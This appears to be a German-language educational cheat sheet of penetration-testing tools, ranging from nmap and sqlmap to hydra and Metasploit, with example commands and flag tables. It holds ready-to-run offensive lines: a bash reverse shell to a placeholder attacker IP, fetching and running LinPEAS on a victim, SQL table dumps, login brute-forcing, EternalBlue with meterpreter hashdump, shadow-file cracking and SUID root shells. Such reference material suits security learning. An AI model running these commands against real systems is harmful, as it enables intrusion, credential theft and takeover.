CyberTools
Die wichtigsten Tools der Cybersecurity β mit ErklΓ€rung, Flags und Beispielen.
Kategorisiert nach Einsatzgebiet.
Reconnaissance & Scanning
Der Standard-Port-Scanner. Findet offene Ports, erkennt laufende Dienste und deren Versionen, erkennt das Betriebssystem. Unverzichtbar am Anfang jedes Pentests.
# Schneller Scan der hΓ€ufigsten 1000 Ports nmap 10.10.10.1 # Alle 65535 Ports scannen nmap -p- 10.10.10.1 # Service-Version + OS-Detection + Scripts (Standard-Combo) nmap -sV -sC -O 10.10.10.1 # Aggressiver Scan (alles auf einmal) nmap -A -p- 10.10.10.1 # Schnell + alle Ports (fΓΌr CTFs) nmap -sV -sC -p- --min-rate 5000 10.10.10.1 # UDP-Scan (langsamer, aber wichtig) nmap -sU --top-ports 20 10.10.10.1 # Ergebnis in Datei speichern nmap -sV -oN scan.txt 10.10.10.1
| Flag | Bedeutung |
|---|---|
| -sV | Service-Versionen erkennen |
| -sC | Standard-Scripts ausfΓΌhren |
| -O | Betriebssystem erkennen |
| -A | Alles: -sV -sC -O + Traceroute |
| -p- | Alle 65535 Ports scannen |
| -sU | UDP-Scan |
| -oN | Output als Textdatei speichern |
| --min-rate | Mindest-Paketrate (schneller Scan) |
Findet versteckte Verzeichnisse, Dateien und Subdomains per Wordlist-Brute-Force. Schneller und effizienter als manuelles Durchsuchen.
# Directory-Scan (hΓ€ufigste Nutzung) gobuster dir -u https://example.com \ -w /usr/share/wordlists/dirb/common.txt # Mit Dateiendungen suchen (.php, .html, .txt) gobuster dir -u https://example.com \ -w /usr/share/wordlists/dirb/common.txt \ -x php,html,txt,bak # Subdomain-Enumeration gobuster dns -d example.com \ -w /usr/share/wordlists/subdomains.txt # Mit Auth-Header (fΓΌr geschΓΌtzte Bereiche) gobuster dir -u https://example.com \ -w /usr/share/wordlists/dirb/common.txt \ -H "Authorization: Bearer TOKEN" # Schnellere Wordlist fΓΌr CTFs: # /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
π NΓΌtzliche Wordlists
- /usr/share/wordlists/dirb/common.txt β schnell, fΓΌr den Anfang
- /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt β umfassend
- SecLists (GitHub) β beste Sammlung ΓΌberhaupt
Schnellster Web-Fuzzer. Kann Directories, Parameter, Header, Subdomains und vieles mehr fuzzen. Das FUZZ-Keyword wird durch Wordlist-EintrΓ€ge ersetzt.
# Directory Fuzzing ffuf -w /usr/share/wordlists/dirb/common.txt \ -u https://example.com/FUZZ # Nur bestimmte HTTP-Codes anzeigen ffuf -w wordlist.txt -u https://example.com/FUZZ -mc 200,301,302 # Parameter Fuzzing (GET) ffuf -w wordlist.txt \ -u "https://example.com/page?FUZZ=value" -mc 200 # Subdomains fuzzen ffuf -w subdomains.txt \ -u https://FUZZ.example.com -mc 200 # Ergebnisse nach GrΓΆΓe filtern (false positives ausblenden) ffuf -w wordlist.txt -u https://example.com/FUZZ -fs 1234
Automatischer Web-Server-Scanner. PrΓΌft auf bekannte Schwachstellen, unsichere Konfigurationen, veraltete Software und gefΓ€hrliche Dateien. Laut, aber umfassend.
# Standard-Scan nikto -h https://example.com # Γber Burp Suite proxyen (um Traffic zu sehen) nikto -h https://example.com \ -useproxy http://127.0.0.1:8080 # Output in Datei speichern nikto -h https://example.com -o nikto_report.txt
Web Security Tools
Das wichtigste Tool fΓΌr Web-Pentesting. Sitzt als Proxy zwischen Browser und Server, fΓ€ngt alle HTTP-Requests ab und ermΓΆglicht das Modifizieren, Wiederholen und automatische Testen von Anfragen. Community Edition ist kostenlos.
Wichtigste Module
# Burp Suite starten (Kali) burpsuite # Proxy lΓ€uft standardmΓ€Γig auf: 127.0.0.1:8080 # Browser-Proxy einstellen (Firefox): # Einstellungen β Netzwerk β Proxy β Manuell # HTTP-Proxy: 127.0.0.1 Port: 8080 # Burp CA-Zertifikat installieren (fΓΌr HTTPS): # http://burp β CA Certificate herunterladen # Firefox: Einstellungen β Zertifikate β Importieren # Request an Repeater senden Strg+R # Request an Intruder senden Strg+I # URL-encode/decode Strg+U
π Workflow
- Proxy aktivieren β Seite im Browser aufrufen β Traffic in Proxy-History analysieren
- Interessanten Request β Rechtsklick β "Send to Repeater" β modifizieren & senden
- FoxyProxy (Firefox-Extension) empfohlen fΓΌr schnelles Proxy-Umschalten
Automatisierte Erkennung und Ausnutzung von SQL-Injection-Schwachstellen. Kann Datenbanken auslesen, Tabellen dumpen und in manchen FΓ€llen sogar Shell-Zugriff erlangen.
# URL auf SQLi testen sqlmap -u "https://example.com/item?id=1" # Alle Datenbanken auflisten sqlmap -u "https://example.com/item?id=1" --dbs # Tabellen einer Datenbank auflisten sqlmap -u "https://example.com/item?id=1" \ -D datenbankname --tables # Tabelle dumpen (alle Daten) sqlmap -u "https://example.com/item?id=1" \ -D datenbankname -T users --dump # POST-Request aus Burp Suite verwenden sqlmap -r request.txt -p username --dbs # Aggressiv + alle Techniken testen sqlmap -u "https://example.com/item?id=1" --level=5 --risk=3
Netzwerk Tools
Ncat (Nmap-Version von Netcat) liest und schreibt Daten ΓΌber TCP/UDP-Verbindungen. Wird fΓΌr Reverse Shells, Bind Shells, Port-Listening und DateiΓΌbertragungen verwendet. Unersetzlich.
# Listener starten (auf eingehende Verbindung warten) ncat -lvnp 4444 # Alternativ mit klassischem netcat nc -lvnp 4444 # Verbindung zu einem Host aufbauen ncat 10.10.10.1 4444 # Reverse Shell empfangen (auf Angreifer-Maschine): ncat -lvnp 4444 # Reverse Shell senden (auf Opfer-Maschine, bash): bash -i >& /dev/tcp/ANGREIFER-IP/4444 0>&1 # Datei ΓΌbertragen (EmpfΓ€nger): ncat -lvnp 9999 > empfangene_datei.txt # Datei ΓΌbertragen (Sender): ncat 10.10.10.1 9999 < datei.txt # Port-Check (ist Port offen?) ncat -zv 10.10.10.1 80
| Flag | Bedeutung |
|---|---|
| -l | Listen-Mode (auf Verbindung warten) |
| -v | Verbose (mehr Output) |
| -n | Kein DNS-Lookup |
| -p | Port angeben |
| -e | Programm nach Verbindung ausfΓΌhren (Bind Shell) |
| -z | Zero-I/O mode (Port-Check) |
Grafischer Netzwerk-Sniffer. Zeichnet Netzwerkpakete live auf und analysiert sie. Unverzichtbar fΓΌr Traffic-Analyse, Protokoll-Debugging und das Finden von Credentials in unverschlΓΌsseltem Traffic.
# Nur HTTP-Traffic anzeigen http # Traffic zu/von bestimmter IP ip.addr == 10.10.10.1 # Nur TCP-Traffic auf Port 80 tcp.port == 80 # POST-Requests filtern (enthΓ€lt oft Credentials) http.request.method == "POST" # PasswΓΆrter in FTP/Telnet suchen ftp telnet # Follow TCP Stream (kompletten Datenaustausch lesen) # Rechtsklick auf Paket β Follow β TCP Stream # Alternativ: tcpdump (CLI-Version) tcpdump -i eth0 -w capture.pcap tcpdump -r capture.pcap port 80
Exploitation Tools
Schneller, parallelisierter Login-Bruteforcer. UnterstΓΌtzt ΓΌber 50 Protokolle: HTTP, SSH, FTP, SMB, RDP, MySQL, SMTP und mehr. Standard-Tool fΓΌr Credential-Angriffe.
# SSH Bruteforce hydra -l admin -P /usr/share/wordlists/rockyou.txt \ 10.10.10.1 ssh # HTTP POST Login Formular hydra -l admin -P /usr/share/wordlists/rockyou.txt \ example.com http-post-form \ "/login:username=^USER^&password=^PASS^:Invalid credentials" # FTP Bruteforce hydra -l admin -P /usr/share/wordlists/rockyou.txt \ 10.10.10.1 ftp # Mehrere Benutzernamen aus Datei hydra -L users.txt -P passwords.txt 10.10.10.1 ssh # Schneller mit mehr Threads hydra -l admin -P rockyou.txt -t 64 10.10.10.1 ssh
| Flag | Bedeutung |
|---|---|
| -l | Einzelner Benutzername |
| -L | Benutzernamen aus Datei |
| -p | Einzelnes Passwort |
| -P | PasswΓΆrter aus Datei (Wordlist) |
| -t | Anzahl paralleler Verbindungen (Standard: 16) |
| -s | Anderen Port angeben |
| -V | Jeden Versuch anzeigen |
Das bekannteste Exploitation-Framework. EnthΓ€lt tausende fertige Exploits, Payloads und Post-Exploitation-Module. FΓΌr CVE-basierte Angriffe, Shellcode-Generierung und Meterpreter-Sessions.
# Metasploit starten msfconsole # Nach Exploit suchen msf6> search eternalblue msf6> search type:exploit platform:windows smb # Exploit auswΓ€hlen msf6> use exploit/windows/smb/ms17_010_eternalblue # Optionen anzeigen msf6> show options # Ziel-IP setzen msf6> set RHOSTS 10.10.10.1 # Eigene IP setzen (fΓΌr Reverse Shell) msf6> set LHOST 10.10.10.99 # Payload wΓ€hlen (Meterpreter empfohlen) msf6> set payload windows/x64/meterpreter/reverse_tcp # AusfΓΌhren msf6> run # System-Info anzeigen meterpreter> sysinfo # Aktuellen User anzeigen meterpreter> getuid # OS-Shell ΓΆffnen meterpreter> shell # Windows-Passwort-Hashes dumpen meterpreter> hashdump # Datei herunterladen meterpreter> download datei.txt
Password Cracking
Schnellster Passwort-Cracker der Welt β nutzt GPU-Beschleunigung. UnterstΓΌtzt ΓΌber 300 Hash-Typen (MD5, SHA1, bcrypt, NTLM, ...). Unverzichtbar wenn man Hash-Dumps aus einer Datenbank hat.
# MD5-Hash cracken (Wordlist-Angriff) hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt # SHA1-Hash hashcat -m 100 -a 0 hash.txt rockyou.txt # NTLM (Windows) hashcat -m 1000 -a 0 hash.txt rockyou.txt # bcrypt (langsam, aber mΓΆglich) hashcat -m 3200 -a 0 hash.txt rockyou.txt # Mit Regeln (PasswΓΆrter mutieren: password β P@ssw0rd) hashcat -m 0 -a 0 hash.txt rockyou.txt -r /usr/share/hashcat/rules/best64.rule # Hash-Typ identifizieren (vorher) hashid '5f4dcc3b5aa765d61d8327deb882cf99' β MD5
| -m Wert | Hash-Typ |
|---|---|
| 0 | MD5 |
| 100 | SHA1 |
| 1400 | SHA256 |
| 1000 | NTLM (Windows) |
| 3200 | bcrypt |
| 1800 | sha512crypt (Linux /etc/shadow) |
| 22000 | WPA2 (WLAN) |
Klassischer Passwort-Cracker. Erkennt Hash-Typen automatisch, crack /etc/shadow-Dateien und viele andere Formate. Besonders praktisch fΓΌr Linux-Hashes und ZIP/PDF-PasswΓΆrter.
# Einfacher Crack (auto-erkennt Hash-Typ) john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt # /etc/shadow cracken (passwd + shadow kombinieren) unshadow /etc/passwd /etc/shadow > combined.txt john combined.txt --wordlist=rockyou.txt # ZIP-Passwort cracken zip2john protected.zip > zip_hash.txt john zip_hash.txt --wordlist=rockyou.txt # SSH-Key cracken ssh2john id_rsa > ssh_hash.txt john ssh_hash.txt --wordlist=rockyou.txt # Bereits gecrackte PasswΓΆrter anzeigen john --show hash.txt
Post-Exploitation
Automatische Suche nach Privilege Escalation Vektoren. LinPEAS fΓΌr Linux, WinPEAS fΓΌr Windows. PrΓΌft hunderte mΓΆgliche Wege um von normalem User zu Root/SYSTEM zu kommen.
# Direkt von GitHub ausfΓΌhren (auf Opfer-Maschine) curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh # Oder: auf eigener Maschine hosten + auf Opfer laden # [Angreifer] HTTP-Server starten: python3 -m http.server 8080 # [Opfer] Datei herunterladen und ausfΓΌhren: wget http://ANGREIFER-IP:8080/linpeas.sh -O /tmp/linpeas.sh chmod +x /tmp/linpeas.sh && /tmp/linpeas.sh # Output in Datei speichern /tmp/linpeas.sh | tee /tmp/output.txt
π Was LinPEAS prΓΌft
- SUID/SGID-Binaries (oft Privilege Escalation mΓΆglich)
- Sudo-Berechtigungen (sudo -l)
- Cron-Jobs (beschreibbare Scripts die als Root laufen)
- Schwache Dateirechte (/etc/passwd, /etc/shadow)
- Credentials in Konfig-Dateien, Historys, Umgebungsvariablen
Keine Tools, sondern Wissensdatenbanken. GTFOBins (Linux) und LOLBAS (Windows) listen auf, welche System-Binaries fΓΌr Privilege Escalation, Shell-Escapes und Dateioperationen missbraucht werden kΓΆnnen.
# SUID-Binaries auf dem System finden: find / -perm -u=s -type f 2>/dev/null # Beispiel: vim hat SUID-Bit gesetzt # β GTFOBins nachschlagen β vim kann Shell spawnen: vim -c ':!/bin/sh' β Root-Shell! # Beispiel: find hat SUID-Bit find . -exec /bin/sh \; -quit β Root-Shell!
π Ressourcen
- GTFOBins: gtfobins.github.io β Linux SUID / Sudo / Shell escape
- LOLBAS: lolbas-project.github.io β Windows Living off the Land
- HackTricks: book.hacktricks.xyz β umfassendes Pentest-Wiki
// wiki.simonwied.com Β· CyberTools Β· FΓΌr Bildungszwecke